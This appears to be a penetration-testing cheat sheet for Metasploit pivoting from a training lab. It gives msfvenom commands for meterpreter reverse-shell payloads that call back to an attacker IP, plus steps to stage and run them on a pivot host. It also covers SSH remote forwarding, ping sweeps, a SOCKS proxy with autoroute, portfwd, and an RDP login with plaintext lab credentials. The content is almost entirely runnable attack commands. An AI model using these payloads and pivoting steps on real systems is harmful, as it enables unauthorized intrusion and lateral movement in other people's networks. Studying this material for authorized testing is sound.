🔃(MSF) Remote/Reverse Port Forwarding with SSH

Meterpreter Reverse Shell

Creating a Windows Payload with msfvenom

Code

msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

Configuring & Starting the multi/handler (msfconsole)

Code

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_https

set lhost 0.0.0.0

set lport 8000

Transferring Payload to Pivot Host

Code

scp backupscript.exe ubuntu@<ipAddressofTarget>:~/

Starting Python3 Webserver on Pivot Host

Code

python3 -m http.server 8123

Downloading Payload from Windows Target

Code

Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Using SSH -R

Code

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

• -vN: verbose and not to prompt the login shell.

• -R: asks the Ubuntu server to listen on <targetIPaddress>:8080 and forward all incoming connections on port 8080 to our msfconsole listener on 0.0.0.0:8000 of our attack host

Meterpreter Tunneling & Port Forwarding

Creating Payload for Ubuntu Pivot Host

Code

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

Configuring & Starting the multi/handler

Code

use exploit/multi/handler

SCP FILE TRANSFER (Transferring Payload to Pivot Host)

Code

scp backupjob ubuntu@<ipAddressofTarget>:~/

scp -r ptunnel-ng ubuntu@10.129.202.64:~/

• -r: transfer the entire repo and the files contained inside a folder

Executing the Payload on the Pivot Host

Code

chmod +x backupjob

./backupjob

Ping Sweep

Code

meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

Example

meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

[*] Performing ping sweep for IP range 172.16.5.0/23
[+]     172.16.5.19 host found

For Loop on Linux Pivot Hosts

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

For Loop Using CMD

for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

Using PowerShell

1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

Note

• It is possible that a ping sweep may not result in successful replies on the first attempt, especially when communicating across networks. This can be caused by the time it takes for a host to build it's arp cache. In these cases, it is good to attempt our ping sweep at least twice to ensure the arp cache gets built.

MSF's SOCKS Proxy

Code

use auxiliary/server/socks_proxy

set SRVPORT 9050

set SRVHOST 0.0.0.0

set version 4a

Confirming Proxy Server is Running

msf6 auxiliary(server/socks_proxy) > jobs

/etc/proxychains.conf

Code

tail -4 /etc/proxychains.conf

Note

• Depending on the version the SOCKS server is running, we may occasionally need to changes socks4 to socks5 in proxychains.conf.

Creating Routes with AutoRoute

msfconsole

use post/multi/manage/autoroute

set SESSION 1

set SUBNET 172.16.5.0

• We can use the post/multi/manage/autoroute module from Metasploit to add routes for the 172.16.5.0 subnet and then route all our proxychains traffic.

Creating Routes with AutoRoute

meterpreter > run autoroute -s 172.16.5.0/23

Listing Active Routes with AutoRoute

meterpreter > run autoroute -p

• -p: list the active routes to make sure our configuration is applied as expected.

Testing Proxy & Routing Functionality

proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

Port Forwarding

Portfwd Options (Meterpreter)

Code

meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19

• -l:

  • Forward: local port to listen on. Reverse: local port to connect to.

• -p:

  • Forward: remote port to connect to. Reverse: remote port to listen on.

• -r:

  • Forward: remote host to connect to.

Connecting to Windows Target through localhost

Code

xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Meterpreter Reverse Port Forwarding